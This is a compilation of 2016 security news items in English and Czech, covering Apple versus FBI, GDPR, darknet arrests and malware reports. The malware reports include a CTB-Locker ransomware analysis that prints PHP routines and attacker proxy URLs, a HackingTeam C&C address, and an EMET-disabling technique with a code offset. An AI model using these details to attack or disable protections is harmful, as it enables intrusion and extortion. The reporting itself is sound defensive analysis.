Apple Won a major court victory against the Federal Bureau of Investigation (FBI) in an ongoing legal battle similar to San Bernardino.
In a New York case, a federal magistrate judge has ruled in favor of Apple, rejecting the U.S. government’s request to force Apple to help the FBI extract data from a locked iPhone.
This ruling from United States Magistrate Judge James Orenstein for the Eastern District of New York is a significant boost to Apple’s pro-privacy stance to resist the agency’s similar efforts over unlocking iPhone 5C of an alleged San Bernardino terrorist.
The ruling [PDF] was issued on Monday as part of the criminal case against Jun Feng, who was pleaded guilty in October last year to drug charges.
The Drug Enforcement Administration (DEA) seized Feng’s iPhone 5 last year, but even after consulting the FBI, it was unable to access the iPhone. According to both the DEA and FBI, it’s impossible for them to overcome the security measures embedded in Apple’s iOS.
Thus, the government filed a legal motion seeking a court order requiring Apple to help in the investigation "under the authority of the All Writs Act of 1789" – the same old law the FBI is invoking in the San Bernardino case – so that the government could bypass the iPhone’s passcode security.
However, the company objected the order, noting that there were nine more criminal cases currently pending in which the U.S. government was seeking a similar court order.
Orenstein also disagrees to the government request for this ruling because it involved the wide interpretation of the All Writs Act that has been used to force private companies, like Apple, to comply with government requests for user information.
Ultimately, Judge Orenstein argued that the government can not misuse the All Writs Act to compel private companies to help extract information from locked devices that the government wants.
Here’s what Orenstein writes:
"The government posits a reading…so expansive—and in particular, in such tension with the doctrine of separation of powers—as to cast doubt on the All Writs Act’s constitutionality if adopted."
A different law, named the Communications Assistance for Law Enforcement Act (CALEA), explicitly forbids the type of interference government requested in this and the San Bernardino case.
What’s worth notable is that in the San Bernardino case, the FBI requires Apple to create a whole new mobile operating system for the terrorist’s iPhone, which is an even greater demand the law enforcement is pushing on Apple, than in this drug case.
However, the decision for the San Bernardino case is still pending. Apple is continuously fighting its legal battle against the FBI, so let's see who’ll win this battle over privacy: Apple or The FBI? What do you think? Know us in the comments below:


Two Years to General Data Protection Regulation Compliance
1.3.2016 Safety

The General Data Protection Regulation (GDPR) governs the use and privacy of EU citizens’ data and the Data Protection Directive governs the use of EU citizens’ data by law enforcement.
EU Data Protection Reform was put forward in January 2012 by the European Commission to make Europe fit for the digital age. At the last days of 2015, an agreement was found with the European Parliament and the Council, following final negotiations between the three institutions. This reform consists of the General Data Protection Regulation (GDPR), that governs the use and privacy of EU citizens’ data, and the Data Protection Directive, that governs the use of EU citizens’ data by law enforcement.

The General Data Protection Regulation (GDPR) as one of the instruments of this reform has finally been agreed after three years of discussion at many levels. It will replace the current Directive and will be directly applicable in all Member States without the need for implementing national legislation. According to European Commission:

“The General Data Protection Regulation will enable people to better control their personal data. At the same time modernised and unified rules will allow businesses to make the most of the opportunities of the Digital Single Market by cutting red tape and benefiting from reinforced consumer trust.”
The new rules will come into force most likely in the first half of 2018. During the two-year transition phase, the Commission will inform citizens about their rights and companies about their obligations.

Therefore, companies have the opportunity to comply with the new legislation in two years transition time. It is suggested to take on the GDPR readiness initiative before the deadline approaches.

General Data Protection Regulation - protecting data

GDPR has considered a hefty fine for some infringements of up to 4% of annual worldwide turnover. The financial impact of the GDPR enforcement on businesses makes it clear why data protection issues must be considered more deeply in executive level of organizations unless this issue has been addressed earlier and there is an allocated budget for compliance with GDPR, buy-in from top management, and a designated roadmap, processes, and people that ensure the organization will meet the regulation in two-year’s time frame.

There are two building blocks for compliance with GDPR. Firstly, a map of data flow that visualize where data comes entered the organization and where it leaves the corporate perimeter. An independent privacy analyst, Chiara Rustici emphasizes that mapping data flow is not just mapping data storage, but data in transit, too.

“GDPR meaning of “data processing” also includes retrieving, consulting, organizing, structuring, aligning, combining, disseminating, disclosing by transmission or soft-deleting data as well as collecting, storing and destroying it,” She said.

Secondly, organization-wide awareness of data protection principles is an important necessity that can happen with the help of the HR or T&D department. It might require a year of campaigning to get everyone realize their role as “data processors” and “data controllers”. In addition, it takes considerable time to embed new data architecture into business and get everyone familiarized with it.

While two years seem a long time away, but organizations should move towards the compliance and start implementing required changes without undue delay.

Let’s close with the timeline of the EU Data Protection Regulation

January 2012 EC Vice-President, Commissioner Viviane Reding, published proposals to reform European data protection rules. This included a draft revised Data Protection Regulation.
May 2012 European Parliament committees began an exchange of views on the draft revised Data Protection Regulation.
July 2012 The first European Parliament working document was produced by lead rapporteur – MEP Jan Philipp Albrecht of the LIBE committee.
October-November 2012 The European Parliament led an inter-parliamentary hearing with national parliaments.
January 2013 A draft report and mark-up of the proposed regulation, based on earlier working documents, was released by Jan Philipp Albrecht.
March 2013 Opinions on Albrecht’s report and revised draft due from all other European Parliament advisory committees.
Autumn 2013 Informal negotiations between the European Parliament and the Council of the European Union. In October the LIBE Committee voted on a compromise text.
March 2014 The EU Parliament ran a plenary vote in first reading of the draft Regulation. and adopted the LIBE Committee’s compromise text.
May 2014 The Council met and produced a report. They reached a partial general approach on specific articles of the GDPR and held an orientation debate on the “one stop shop” mechanism.
October 2014 The Council reached a partial general approach on Chapter IV of the GDPR
March 2015 The Council reached a partial general approach on Chapters II, VI and VII.
Spring 2015 The Council continued to work at a technical level.
June 2015 The Council released their general approach. Trilogue negotiations between the three institutions are ongoing.
24 June Kick off trilogue meeting
14 July Second trilogue
17 December 2015 The EU General Data Protection Regulation was agreed.
2018 Revised Data Protection Framework is expected to come into force.


Sandboxing Sophosu dokáže zablokovat i pokročilé hrozby

1.3.32016 Zabezpečení
Své řešení Email Appliance rozšířil Sophos o Sandstorm, technologii sandboxingu, která podle něj umožňuje detekci, zablokování i vyřešení i sofistikovaných a neustále se měnících hrozeb.

Sandstorm zajišťuje ochranu proti pokročilým hrozbám typu APT (advance persistent threat) i proti malwaru využívajícímu dosud nezveřejněné zranitelnosti (tedy tzv. zero-day threat).

Současný malware je podle Sophosu navržený tak, aby útočil nenápadně a pomalu a zůstal běžnými prostředky neodhalený, přičemž k zabránění, nebo alespoň oddálení detekce využívá polymorfní i maskovací techniky.

Sandstorm využívá cloudovou technologii, která tyto typy hrozeb izoluje a řeší ještě před jejich proniknutím do podnikové sítě. IT manažeři navíc mají k dispozici podrobné přehledy o chování hrozeb i výsledcích analýz, díky kterým mohou v případě potřeby dále zkoumat jednotlivé bezpečnostní incidenty a přijímat odpovídající opatření.

Technologie Sandstorm tak představuje další vrstvu pro bezprostřední detekci i ochranu. Běžné technologie jsou zpravidla velmi nákladné a pro implementaci i monitoring vyžadují další znalosti z oblasti bezpečnosti. To prý v případě nové technologie Sophosu neplatí.

Sandstorm přitom identifikuje potenciálně nebezpečné chování napříč různými operačními systémy včetně Windows, Mac i Android, a to ve fyzických i virtualizovaných prostředích, v síťové infrastruktuře, v mobilních aplikacích, v elektronické poště, v PDF i wordových dokumentech i ve více než dvou desítkách souborů dalších typů.

Novinka je k dispozici i jako rozšíření řešení pro ochranu webů Web Appliance, které kontroluje obsah webových stránek a blokuje i nejnovější webové hrozby, a také v rámci systému UTM 9.4.


New HackingTeam OS X RCS spyware in the wild, who is behind the threat?
1.3.2016 Apple

A new OS X sample of the Hacking Team RCS has been detected in the wild, who is managing it? Is the HackingTeam back?
A group of malware researchers has discovered a new strain of Mac malware undetected my most security firm, but more intriguing is the speculation that the malicious code may have been developed by the Italian security firm HackingTeam.

Pedro Vilaça, a security researcher at SentinelOne, has published an interesting post titled “The Italian morons are back! What are they up to this time?” that analyzes a sample of OS X RCS recently received by the expert. Remote Control System, aka RCS, is the surveillance software developed by the Italian firm and used by a large number of government and intelligence agencies worldwide.

Hacking Team RCS alleged clients

The sample was uploaded on February 4 to the VirusTotal which at the time confirmed that the malware wasn’t detected, meanwhile at the time I’was writing it has a detection rate of 15/55.

HackingTeam Mac OS RCS 2016 Virus Total

)The analysis of the new sample received by Vilaça revealed that the installer was last updated in October or November, and the configuration date for this sample is October 2015, a few months after the HackingTeam hack.

“First we locate the configuration file encryption key and then decrypt it. There we can find the configuration dates for this sample, 2015-10-16, confirming that this is indeed a post hack sample. The C&C server IP for this sample is 212.71.254.212. It’s already down and I didn’t verified if it was up before starting to tweet about this sample on last Friday” states Vilaça.

Still,Vilaça used the Shodan search engine and VirusTotal to perform further researches on the C&C server, he discovered that the machine referenced by this OS X RCS sample was still active in January.

What happened to HackingTeam after the clamorous data breach? At the time they promised to release a new version that they were telling was not affected by the hack. Is this really true?

The company announced to release a new version of its surveillance software, but the analysis of the source code of this new sample suggests that is has been compiled out of the leaked source code base, and apparently it hasn’t introduced new improvements.

“I can guarantee you that this sample code is coming from that code base, up to the last commit (there are probably newer commits after the leak). HackingTeam appears to have resumed their operations but they are still using their old source code for this. Of course there is a question of are they using both old and the new promised source code or were they just lying about it and resumed operations with old code since they are probably on a shortage of engineering “talent”? This is definitely a question their customers will have to ask them ;-).” continues the expert.

The expert concluded that the new strain of Mac malware is a very fresh sample that demonstrates that the HackingTeam is still alive and that is is operating under cover.

“HackingTeam is still alive and kicking but they are still the same crap morons as the e-mail leaks have show us,” Vilaça wrote. “If you are new to OS X malware reverse engineering, it’s a nice sample to practice with. I got my main questions answered so for me there’s nothing else interesting about this. After the leak I totally forgot about these guys :-).”

Another interesting analysis of this new sample of the RCS spyware has been published by Patrick Wardle, a cyber security expert at Synack. Wardle explained that the new sample is based on the old HackingTeam RCS code, but implements sophisticated techniques to evade detection and analysis.

Last summer, at Blackhat Wardle gave a presentation entitled Writing Bad @$$ Malware for OS X that provided suggestions as to how OS X malware could be improved, including the use of Apple’s native encryption scheme to protect malicious binaries.

“Diving in, the first thing we notice is that it is encrypted with Apple’s native OS X encryption scheme.” wrote Wardle. “… it’s nice to finally see some OS X malware that uses Apple’s native OS X encryption scheme, as well as custom packers. “

The expert noticed that the installer was “packed” with this technique to make hard reverse engineering and analysis.

At this point, there are two hypotheses on the origin of the sample:

Someone is maintaining and updating the code leaked in the HackingTeam hack.
HackingTeam is back, but it is still using old RCS code with a few improvements.
Let me close with the last update provided by Vilaça in his analysis.

“I just found some unique code in this dropper. This code checks for newer OS X versions and does not exist in the leaked source code. Either someone is maintaining and updating HackingTeam code (why the hell would someone do that!?!?!) or this is indeed a legit sample compiled by HackingTeam themselves. Reusage and repurpose of malware source code happens (Zeus for example) but my gut feeling and indicators seem to not point in that direction.”


Facebook a Twitter v nebezpečí? Islámský stát vyhrožuje

1.3.2016 Sociální sítě
Vedoucí pracovníci sociálních sítí se stali novým terčem bojovníků samozvaného Islamského státu. Důvodem jsou pokračující snahy o narušení jeho komunikačních a náborových kanálů.

Poprvé se teroristická skupina, zřejmě pod vlivem pokusů sociálních sítí zamezit extremistické komunikaci, odhodlala k přímým výhružkám na výkonné ředitele Facebooku a Twitteru.

V pětadvacetiminutovém videu nazvaném „Flames of the Supporters“ (Ohně přívrženců), publikovaném skrze ruský instant messaging software Telegram, se nacházejí fotografie spoluzakladatele Facebooku Marka Zuckerberga a CEO Twitteru Jacka Dorseyho s digitálně vloženými dírami od kulek. Video zveřejnila divize Sons Caliphate Army, což je domnívaná hackerská skupina Islámského státu.

Kromě toho teroristé zesměšnily snahy sociálních sítí blokovat teroristické skupiny od užívání svých služeb. Ve videu se objevují zmínění hackeři, vkládající propagandu a chlubící se, že hacknuli více než 10 000 facebookových účtů a přes 5000 twitterových profilů.

Videa si poprvé všiml časopis Vocativ, který též ohlásil, že na konci videa je učiněna přímá výhružka Zuckerbergovi a Dorseymu.

„Každý den hlásíte, že blokujete mnoho našich účtů, a k vám my říkáme: To je vše, co umíte?“ Vysmívají se islamističtí hackeři skrze text na videu. „Nedosahujete naší úrovně… když zavřete jeden účet, my si jich na oplátku deset vezmeme a brzy budou vaše jména smazána z vašich stránek, s vůlí Alláhovou, a vy poznáte, že to, co říkáme, je pravda.“

Facebook i Twitter se odmítly k videu vyjádřit. Obě společnosti však daly najevo, že i nadále budou bránit teroristickým skupinám v užívání svých služeb.

Zuckerberg se vyjádřil podobně například na letošním Mobile World Congressu v Barceloně, kdy prohlásil, že nechce, aby teroristé užívali Facebook k přilákání a výcviku nových rekrutů, ani k opěvování útoků.

Twitter zase v únorovém příspěvku na vlastním blogu sdělil, že zablokoval přes 125 tisíc účtů od poloviny roku 2015, a to jen za vyhrožování či za podporu terorismu – většinou souvisejících s Islámským státem. Společnost také vyjádřila snahu o lepší a rychlejší kontrolu oznámení o teroristech užívajících její síť.

„Odsuzujeme užívání Twitteru k podpoře terorismu a pravidla Twitteru jasně říkají, že tento druh chování, stejně jako jakékoli násilné výhružky, není na naší službě povolen,“ napsala společnost v příspěvku.

S viditelnými pokusy obou sociálních sítí o potlačení schopnosti IS fungovat na sítích není překvapivé, že teroristé vrací úder, tvrdí Dan Olds, analytik pro The Gabriel Consulting Group.

„Oba, Zuckerberg i Dorsey, vedou silné sociální sítě, které hrály důležitou roli v náborových snahách Islamského státu,“ řekl Olds. „Když se tyto společnosti snaží IS vyřadit ze hry, není překvapením, že ten odpoví výhružkami.“

Poslední výhružky ovšem zcela zavrhl a prohlásil, že nic nezmění na snahách Facebooku a Twitteru.

„Šlo by však o úplně jinou situaci, kdyby se udál fyzický, organizovaný útok na jednu ze společností nebo její zaměstnance,“ pokračuje Olds. „Úspěšný útok by bohužel mohl věci dost změnit. Ale myslím, že obě společnosti pravděpodobně zvýšily zabezpečení ve světle těchto výhružek; takže provést úspěšný útok by určitě nebylo snadné.“

Jeff Kagan, nezávislý IT analytik, řekl, že předpokládá zvýšení zabezpečení u obou společností, ale nemá dojem, že by se změnilo i něco dalšího.

„Problém je, že nevíme, co brát vážně, a co ne,“ řekl. „Domnívám se, že pokud toto je cesta, jíž se bude situace dál ubírat, nezbývá nám, než se připravit a pokračovat dál v této nové realitě.“

Analytik Zeus Kerravala souhlasí: „Jak Facebook, tak Twitter jsou velké nástroje náboru pro Islámský stát, takže Zuckerberg a Dorsey bezprostředně ohrožují jeho růst.“


Policie si došlápla na nelegální weby. Razie proběhla v sedmi zemích

1.3.2016 Bezpečnost
Rozsáhlou razii proti provozovatelům a uživatelům nelegálních internetových stránek provedla minulý týden policie v sedmi evropských zemích. Prohledala 69 bytů a firem a zadržela devět podezřelých. S odvoláním na německý Spolkový kriminální úřad (BKA) o tom informovala agentura DPA.
Koordinovaná akce se uskutečnila minulé úterý a středu kromě Německa také v Bosně a Hercegovině, Švýcarsku, Francii, Nizozemsku, Litvě a Rusku. Policisté se při akci zaměřili na obchod se zbraněmi, drogami, falšovanými penězi a dokumenty provozovaný prostřednictvím internetových platforem.

Někteří ze zadržených jsou kromě obchodování podezřelí rovněž z toho, že záměrně infikovali cizí počítače škodlivými programy, kradli důvěrná data jako například informace k bankovním účtům a že nabízeli ilegálně streamovací služby či návody na páchání trestných činů.

Hlavním podezřelým je podle německé policie 27letý občan Bosny a Hercegoviny, který je od minulé středy ve vazbě. Od roku 2012 hrál údajně klíčovou roli při provozu nelegálních stránek. Tři Němce a dva Syřany, kteří s ním spolupracovali, zadrželi policisté v Německu. Zabavili u nich množství počítačů a zbraní, celkem téměř 40 kilogramů drog a značnou hotovost.


Úřady nemohou Apple nutit, aby odkódoval iPhone, míní soudce

1.3.2016 Mobilní
Americké ministerstvo spravedlnosti nemůže nutit počítačový gigant Apple, aby Federálnímu úřadu pro vyšetřování (FBI) umožnil přístup k datům v iPhonu při vyšetřování drogového případu v Brooklynu. V pondělí to prohlásil newyorský soudce James Orenstein, uvedla agentura AP. Nedávno přitom soud v Kalifornii Applu nařídil, aby umožnil úřadu přístup k datům v kauze zabijáka ze San Bernardina.
Měl by Apple zpřístupnit data ve svých přístrojích úřadům v případě vyšetřování?
Loni v říjnu soudce Orenstein vystoupil s tím, že novelizovaný zákon z roku 1789, který úřad v souvislosti s vyšetřováním organizovaného zločinu používá, nelze na společnost Apple vztáhnout. Podle právníků od té doby počítačový gigant odmítl žádost o spolupráci v tomto smyslu už nejméně v šesti případech v Kalifornii, Illinois, Massachusetts a v New Yorku.

Orenstein pak podle svého přesvědčení postupuje i v dalších případech, z nichž jeden se týká i rutinního vyšetřování dealera metamfetaminu.

Přístup Applu je jeho příznivci v hojné míře podporován, kvůli kauze odblokování iPhonu střelce ze San Bernardina dokonce uspořádali několik demonstrací. Stanovisko počítačového gigantu se totiž podle nich úzce dotýká svobody každého z nich, která by byla prolomením zabezpečení kvůli získání přístupu k datům ze strany úřadů porušena.

FBI se snažila do uzamčeného iPhonu dostat celé dva měsíce. Útočník ze San Bernardina měl ale svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal, s čímž si bezpečnostní experti z FBI evidentně nedokázali poradit.

Vyšetřovatelé proto chtějí nyní po Applu, aby jim udělal „zadní vrátka“ do systému iOS. Ten využívají nejen chytré telefony iPhone, ale také počítačové tablety iPad.

Problém je ale v tom, že implementací takového nástroje do zmiňované mobilní platformy by byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti. A nehraje roli, zda by šlo o přístroj teroristy nebo běžného občana.


European police corps arrested operators behind darknets offering illegal products and services
1.3.3016 Crime

A coordinated operation of law enforcement agencies in 7 countries raided operators of darknets trading in illegal products and services.
A joint effort of law enforcement agencies in seven European countries (Germany, Bosnia, Switzerland, France, the Netherlands, Lithuania and Russia) allowed authorities to identify and arrest operators of darknet online platforms trading in illegal products and services, including drugs, fake IDs, weapons, and counterfeit money. According to the German authorities, nine suspects have been arrested by the police that targeted 69 homes and businesses in the seven countries.

The list of arrested suspects includes:

A 27-year-old Bosnian national which is considered the technical administrator of three darknets.
A 22-year-old German national who operated ran a trading platform specialized in the sale of illegal drugs.
Two Syrian brothers aged 19 and 28 in possess of 36 kilogrammesof amphetamine, 1.5 kg of cocaine, 2 kg of hashish and 2.3 kg of ecstasy pills.
Two German men aged 29 and 21, one of them is accused of the management of two illegal networks and an illegal streaming platform for pirated movies and sports shows.
Underground Cybercrime market - Darknets

The law enforcement seized 150,000 euros in cash and assets, servers in France, the Netherlands, Lithuania and Russia as well as several PCs and storage media, a firearm, and illegal drugs.

The German security services defined the operation as a “a major blow against the German-speaking underground economy and further proof that there is no complete anonymity on the Internet, including in the so-called darknet”.
German federal police and Frankfurt prosecutors revealed that the suspects exploited darknets to sell illegal drugs (amphetamines, cannabis, cocaine, ecstasy and heroin) and counterfeit documents from German, the Netherlands and Italy.

The criminal organization was also offering for sale stolen credit card data, online banking and webservice login credentials, and was also able to provide illegal services such as botnet for rent and hacking services.

This is another success of a shared operation of law enforcement.


CTB-Locker is back: the web server edition
1.3.2016 Zdroj: Kaspersky Virus

Cryptolockers have become more and more sophisticated, bypassing system protections and terrifying anyone in their path. TeslaCrypt, CryptoWall, TorrentLocker, Locky and CTB-Locker are only some of the malware we have protected from for the past two years. We have seen many shapes and colors of cryptolockers, but the new CTB-Locker variant says it all. The world of cybercriminals is investing in how to reinvent cryptolockers.

Before, CTB-Locker, or Onion Ransomware, differed from other ransomware in the usage of the Tor Project’s anonymity network to shield itself from takedown efforts that rely largely on static malware command and control servers. Its use of Tor also helped evading detection and blocking. Another thing that protected CTB-Locker controllers was accepting as payment only Bitcoins, the decentralized and largely anonymous crypto-currency known.

A new variant of the CTB-Locker targets web servers only, and to our knowledge it has already successfully encrypted web-root files in more than 70 servers located in 10 countries.

 

In this blogpost I will take you into the “lion’s den”, after victims were kind enough to share the cryptors that had been deployed into their web servers.

Step 1: defacement

This new variant aims to encrypt web servers and demand less than half a bitcoin as a ransom (~150 USD). If payment isn’t sent on time the ransom is doubled to approximately 300 USD. When paid, the decryption key is generated and is used to decrypt the web server’s files.

It has become clear that the web servers infected with this variant were targeted due to a security hole in their web server. Once exploited, the website is defaced. Defacement is a well-known method for hacking groups to show their victims they mean business. The most recent cases we’ve witnessed are not random, but mostly about political affiliations and cultural perspectives.

 

In this case, the defacement, which contains a replacement of the main php/html page, is used as the message carrier and contains all the means necessary for the attack to leave the right impression on the victim. We will deep-dive into it in the next steps.

It is important to mention that the original code is not deleted. It is stored safely in the web root with a different name in an encrypted state.

The message

As variants of malware of this kind are based on the simple fact that a victim cares more about his content than about paying a ransom, the authors usually leave a very detailed message for everyone to see.

The following quote is a part of the information that is left on the main page:

 

The decryption key is stored on a remote server, but the attackers were “kind enough” to allow the victim to decrypt two files free, as a sign of authenticity.

The other function that exists on the attacked website allows the victim to communicate with the attacker via chat: it requires a personal signature/code which is available for victims only.

At the moment, no decryption tool exists in the wild, thus there is no way to decrypt the files encrypted by the new CTB-Locker. The only way to remove this threat in a matter of seconds is to keep file backups in a separate location.

Although this seems like a big concern, we tend to believe that it is not. Large websites tend to have multiple versions of their content, spreading over a number of webservers. In many other cases, they are supervised and tested by professional security penetration testing firms and so are constantly under the magnifier.

Step 2: encryption process

We still don’t know how the CTB-Locker is being deployed on web servers, but there is one common thing among many of the attacked servers – they use the WordPress platform as a content management tool. WordPress contains many vulnerabilities in its non-updated versions and we already seen critical vulnerabilities presented last year. In addition, WordPress also has another weak spot – plugins. Those tiny enhancement features helps WordPress become what it is – a leader in the world of CMS. However, having third party plugins also makes the server more vulnerable to attacks, as plugin authors are not committed to any type of security measurements.

Once the malware author is inside WordPress system, he is able to replace the main website file and execute the encryption routine. The main file is renamed and saved in an encrypted state.

Two different AES-256 keys are deployed to the victim server:

create_aes_cipher($keytest) – encrypts the two files which can be decrypted free.
create_aes_cipher($keypass) – encrypts the rest of the files hosted on the server web root.
 

The two files are chosen by the authors and their names are saved in a text file.

The create_aes_cipher() accepts one parameter as the key and sends it to the standard Crypt_AES() function:

function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes-&gt;setKeyLength(256);
$aes-&gt;setKey($key);
return $aes;
}
1
2
3
4
5
6
function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes–&gt;setKeyLength(256);
$aes–&gt;setKey($key);
return $aes;
}
When encrypting the site, the script first uses the test key to encrypt the two files that will be used for free decryption. It will then generate a list of files that match specific file extensions and encrypt them using AES-256 encryption. The extensions that will be encrypted are read from the ./extensions.txt file and are currently:

 

Files that contain the following strings will be excluded from the encryption process:

“/crypt/”
“secret_”
In addition, files which are populated with data that will later assist the user with the decryption process would obviously be excluded as well.

./index.php – as described above, this file is the main door for the victim to analyze the attack and contains PHP code of the encryption/decryption routine.
./allenc.txt – contains a list of all encrypted files.
./test.txt – contains the files which are freely available for decryption.
./victims.txt – contains a list of all the files that are being encrypted or have already been encrypted.
./extensions.txt – contains the list of file extensions (see above).
./secret_ – as said, the victim is required to identify himself before the free decryption or chat is even possible.
On the main page of the CTB-Locker, attackers are using JQUERY to query proxy servers and verify payments. The following code was found in the page source code and the servers listed on the top are proxies which are used as another layer of protection, instead of the main server of the attackers:

 

Proxy servers which are part of the decryption process:

http://erdeni.ru/access.php
http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware servers are not permanent and are being replaced by new ones every certain period of time. We have identified the threat actor inspecting the server logs and analytics, as sometimes different checks resulted in the server shutting down and turned back on.

Step 3: proxy to C&C

The attackers are utilizing servers which were already attacked to traffic through another layer of protection. On a victim server’s source code, a JavaScript code reveals how the decryption process is sent through three different servers randomly, however those are not the C&C.

 

The above screenshot was taken from the access.php page, supposedly located in each one of the bot servers used as a proxy for the decryption process.

In white block is the actual C&C which has been hardcoded on each of the PHP pages (access.php).

When POST request is being sent with the right parameters, a socket instance is being created and sends a connect beam to the attacker’s C&C server. Later it is being determined if the decryption process succeeded.

Free decrypt

The ransomware allows the victim to freely decrypt not more than two files. It is not for the victim to choose, since the files are pre-chosen and can be found in the malware’s designated file as listed above. The two files are randomly picked during the course of the encryption process.

The following image is an illustration of the free decrypt module:

 

In order to decrypt the two free files, the victim is required to enter the secret_ file name. Once you click the DECRYPT IT FREE button, the client-side script builds a POST request and sends it to one of the C&C servers. We were able to imitate the PHP calculation and run the exit() function of the free decryption routine:

 

The following is the PHP code at the back-end. The function secret_ok() verifies the identity of the victim, based on his domain name and other indicators:

if (isset($_GET[‘dectest’]) && secret_ok()) {
decrypt_files(‘test.txt’, $_GET[‘dectest’]);
exit(‘Congratulations! TEST FILES WAS DECRYPTED!!’);
}
1
2
3
4
if (isset($_GET[‘dectest’]) && secret_ok()) {
decrypt_files(‘test.txt’, $_GET[‘dectest’]);
exit(‘Congratulations! TEST FILES WAS DECRYPTED!!’);
}
Threat actor’s chat room

The ransomware also includes functionality to communicate with the malware authors. As already said, the victim is required to use the secret_ key in order to open the chat. Without it, the chat will remain unresponsive.

 

We have come to the conclusion that ransomware is the new-generation malware for an attacker interested in financial gain. They are very effective, there is no solid solution against this threat thus far, and they are flexible to attack not only desktop operating systems, but now web servers as well.

We urge anyone to backup all important data; and to be cautious about emails which are not specifically meant for the user, or attractive ads that appear online. In addition, third party software must not be trusted automatically by its hash. This identifier can be changed by an attacker once a server has been compromised. Be sure to use other routine checks to ensure that the software is legitimate.


Apple TV je děravá jako ementál. Odhaleny byly desítky nebezpečných chyb

29.2.2016 Zranitelnosti
Více než šest desítek bezpečnostních trhlin bylo objeveno v multimediálním centru Apple TV. Některé z objevených trhlin mohli počítačoví piráti zneužít k průniku do zmiňovaného zařízení. Opravy trhlin jsou však již k dispozici.
Nebezpečné chyby se týkají multimediálních center, ve kterých běží starší operační systém tvOS, než je verze 7.2.1. Právě toto vydání obsahuje záplaty pro všechny odhalené zranitelnosti.

Trhliny se týkaly takřka dvou desítek předinstalovaných aplikací, ale například i samotného jádra této televizní platformy, uvedl server Security Week.

Piráti mohli uživatele klidně i odposlouchávat, aniž by si toho všiml
Chyby mohli kybernetičtí nájezdníci zneužít k tomu, aby se dostali k uloženým citlivým informacím, aby způsobili pád určitých aplikací, případně aby spustili libovolný škodlivý kód. To jinými slovy znamená, že mohli uživatele klidně i odposlouchávat, aniž by si toho všiml.

Žádné zneužití chyb ze strany počítačových pirátů však zatím nebylo prokázáno. Přesto bezpečnostní experti upozorňují, že riziko nebylo malé.

Aktualizace přišly až po roce
Problém byl podle bezpečnostních expertů především v tom, že Apple nezáplatoval nebezpečné díry průběžně.

Předchozí verze vyšla loni v dubnu, tedy v podstatě téměř před rokem. Proti tomu například aktualizace pro iPhony a iPady jsou vydávány skoro každý měsíc. Kyberzločinci díky tomu nemají tolik času si systém pořádně „proklepnout“.

Apple TV je v podstatě malá krabička, která je vybavena wi-fi modulem, ethernetovým portem a HDMI výstupem. U televizoru nahrazuje funkce multimediálního centra, do nejnovější verze je ale navíc možné instalovat i aplikace. Nechybí v ní ani virtuální asistentka Siri.


Using the Microsoft EMET security tool to hack itself
29.2.2016 Security

The security researchers at FireEye Abdulellah Alsaheel and Raghav Pande have found a way to exploit Microsoft EMET (Enhanced Mitigation Experience Toolkit) to hack itself.
The security researchers at FireEye security Abdulellah Alsaheel and Raghav Pande have found a way to exploit the Microsoft security tool Enhanced Mitigation Experience Toolkit to hack itself. The Enhanced Mitigation Experience Toolkit was introduced by Microsoft to raise the cost of exploit development, it cannot be considered a solution that is able to protect systems from any malicious exploit.

The experts elaborated a technique to disable the Microsoft Enhanced Mitigation Experience Toolkit using the tool itself.

EMET Enhanced Mitigation Experience Toolkit

The Enhanced Mitigation Experience Toolkit was designed to protect systems against attackers by identifying patterns of cyber attacks.

“EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and helps protect by diverting, terminating, blocking, and invalidating those actions and techniques. EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software.” is the description provided by Microsoft for its tool.

The Enhanced Mitigation Experience Toolkit works by injecting anti-malware library in into applications in the attempt of early detect any suspicious activity by hooking process in execution and analyzing any calls in critical APIs .

“EMET injects emet.dll or emet64.dll (depending upon the architecture) into every protected process, which installs Windows API hooks (exported functions by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks provide EMET the ability to analyze any code calls in critical APIs and determine if they are legitimate. If code is deemed to be legitimate, EMET hooking code jumps back into the requested API. Otherwise it triggers an exception.” wrote the security duo.

The researchers focused their efforts in disabling the Enhanced Mitigation Experience Toolkit, this means that an attacker could include in his application the code that invokes a function within the tool that disable it.

The exit “feature” is implemented in the emet.dll for cleanly exiting from a process.

“However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.”

The unique problem for the researchers was to retrieve the base address of emet.dll to invoke the function to arrest it. The experts used the GetModuleHandleW function that is not hooked by the Microsoft Enhanced Mitigation Experience Toolkit to retrieve the address.

This is not the first time that security experts find a way to bypass the Enhanced Mitigation Experience Toolkit, but differently from the past, the technique proposed by the duo doesn’t rely on vulnerabilities or missing features.

“This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is exported, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).” explained the security duo.


Chinese ISPs are redirecting users legitimate traffic to malicious sites/ads

29.2.2016 Virus

Chinese ISPs (internet service providers) are redirecting users legitimate traffic to malicious websites serving malware and ads.
China is know to be not very “ortodox” when talking about freedom on the internet, over the time, it developed numerous projects to monitor users’ activity. The Great Firewall

Now three Israeli researchers uncovered that Chinese ISPs (China Telecom and China Unicom) are injecting content into the users’ traffic.

The way these two Chinese ISPs pollute their client’s network was by setting up proxy servers that lead clients in advertisement links and malware.

When a user access a domain that is under one of these Chinese ISP’s, the altered packet redirects the users browser to parse the rogue network routes. The result is that the initial traffic will be redirected to malicious sites serving adversities and malware.

In their paper, the researchers detailed the tactics used to conduct such kind of attacks and how the IPSs monitor the network traffic for specific URLs altering the traffic.

Chinese ISPs inject malware adsChinese ISPs inject malware ads 2

The ISPs are using two injection techniques, the first one called Out of Band TCP Injection and the second its HTTP Injection.

